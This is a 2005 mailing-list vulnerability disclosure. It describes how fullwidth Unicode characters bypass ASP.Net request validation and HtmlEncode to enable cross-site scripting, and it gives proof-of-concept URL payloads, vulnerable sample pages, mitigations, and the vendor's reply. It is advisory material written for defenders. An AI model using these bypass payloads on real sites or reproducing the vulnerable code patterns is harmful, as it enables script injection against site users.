XSS vulnerabilty in ASP.Net [with details]

[Andir Andir <spam_andir@xxxxxxx>]

In August 2004 I found XSS vulnerability in Microsoft ASP.Net, and now I publish
it.

Full details:
En: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml
Ru: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.ru.xml

P.S. I to present my appologies for bad english :( My native language is
Russian.

With best regards, Andir!

>From David Ahmad <da@xxxxxxxxxxxxxxxxx>: 
>Please include the full details in your message. Thank you!

Details from http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml:

---------------------------------------------------------------------------------
XSS vulnerability in ASP.Net

Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State 
University), Vladivostok, Russia, andir[SPAM-PROTECT]@it-project.ru.

February 9, 2005, updated February 14, 2005

Abstract

In specific conditions the cross-site scripting attack (XSS) [1] are possible 
on web site under management ASP.Net, because used a wrong filtration of 
special HTML characters. Attack exploits vulnerability of mechanism of 
converting Unicode strings [2] to national ASCII codepages. The basic problem 
arises from the lack of a filtration of special HTML characters in range 
U+ff00-U+ff60 (fullwidth ASCII characters [3]).

Introduction

The problem has been discovered in August 2004. Affected all versions of .Net 
Framework what exist at present day:

    * .Net Framework, version 1.0
    * .Net Framework, version 1.0 + service pack 1
    * .Net Framework, version 1.0 + service pack 2
    * .Net Framework, version 1.1
    * .Net Framework, version 1.1 + service pack 1
    * .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004 
from February 8, 2005

After some testing, similar problem has been discovered in free implementation 
of .Net Framework by Mono Project [4]. Affected following versions:

    * Mono, version 1.0.5.

Note: Another versions has not been tested.

Background

.Net Framework manipulates strings in Unicode only. Converting from/to national 
codepages ASCII is possible for input/output respectively. In particular, HTML 
text may be outputted on Web page in national ASCII codepage (such as 
'windows-1251', 'koi-8', and more) with using ASP.Net. In this conditions 
Unicode characters from range U+ff00-U+ff60 (fullwidth ASCII characters) would 
be converted to normal ASCII characters respectively. Among fullwidth ASCII 
characters present some special HTML characters (such as '<', '>', and others), 
which may be used for injecting malicious HTML code or malicious script code 
(with <script> HTML tag) or other variants (more details in [5]).

Vulnerability Details

Has been discovered that mechanism of ASP.Net has no filtration of special HTML 
characters (such as '>', '<' and others) in Unicode strings for output web page 
in one from national ASCII codepages.

   1. Injection of special HTML characters to ASP.Net web-page with using 
Unicode characters from fullwidth ASCII characters range.

      Example:

      
http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack1.aspx' prints HTTP request parameter 'test'.
      Web page like following:

     <!-- Web page attack1.aspx -->
     <% @Page Language="cs" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL 
parameter
     %>                                         

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>           

  2. ASP.NET Request Validation Bypass Vulnerability.

      The "Request Validation" mechanism designed to protect against Cross-Site 
Scripting and SQL injection allows restricted tags in Unicode range of 
fullwidth ASCII characters U+ff00-U+ff60.

     Example:
     
http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

     Web page 'attack2.aspx' prints HTTP request parameter 'test'.
     Web page like following:

     <!-- Web page attack2.aspx -->
     <% @Page Language="cs" validateRequest="true" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL 
parameter
     %>                                 

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>           

     Note: attribute of ASP.Net Web page - validateRequest allowed only for 
ASP.Net of version 1.1 and more, or for Mono (no any information about 
versions) [6].
  
  3. HTML Encoding methods bypass
      Note: This attack does not applied to ASP.Net in Mono implementation.

      HttpServerUtility.HtmlEncode has no filtration mechanism for Unicode 
characters from range U+ff00-U+ff60.

      The methods for encoding special HTML characters does not protect from 
attacks in previous examples. Encoding process used before converting to 
national ASCII codepage for output, and attacker may use fullwidth ASCII 
characters for injecting malicious code on Web page.

      Example: 
http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack3.aspx' prints:
         1. HTTP request parameter 'test',
         2. Some string with injected Unicode characters.

      Web page like following:

     <!-- Web page attack3.aspx -->
     <% @Page Language="cs" %>
     <%
        Response.Write(Server.HtmlEncode(Request.QueryString["test"])); // 1) 
Attack through URL parameter
        string code = 
Server.HtmlEncode("\xff1cscript\xff1ealert('vulnerability')\xff1c/script\xff1e");
 // 2) Attack through injected Unicode characters 
        Response.Write(code);
     %>

     Web.config for server.com like following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>

Protection Methods

Some variants of protection methods may be proposed:

    * Use only Unicode codepage for output on ASP.Net pages, for this purpose 
add web.config like following:

    <configuration>
      <system.web>
        <globalization responseEncoding="utf-8" />
     </system.web>
    </configuration>
                                                

    * If you cannot use Unicode, you must to filter fullwidth ASCII characters 
from any untrusted data sources (user input, HTTP headers, some components 
ouput and other data). 

More Information

About this vulnerability has been reported to Microsoft Security Response 
Center at August 2, 2004 and received answer that opened case 5438 for 
description of vulnerability. Later, I received following answer:

"We have decided that a KB article and update to tools and/or best practice 
guidelines should be done for this, and will be as time permits. We are not 
tracking this case as a security bulletin".

Vulnerability has no patch at current moment (February 9, 2005).
References

   1. CERT  Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web 
Requests, http://www.cert.org/advisories/CA-2000-02.html
   2. Unicode Home Page, http://unicode.org/.
   3. Unicode.org, Halfwidth and Fullwidth Forms, 
http://www.unicode.org/charts/PDF/UFF00.pdf.
   4. Mono Project, http://mono-project.com/.
   5. CGISecurity.com, "The Cross Site Scripting FAQ.", May 2002, 
http://www.cgisecurity.com/articles/xss-faq.shtml.
   6. .Net Framework SDK, @Page directive, ValidateRequest attribute, 
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpgenref/html/cpconPage.asp.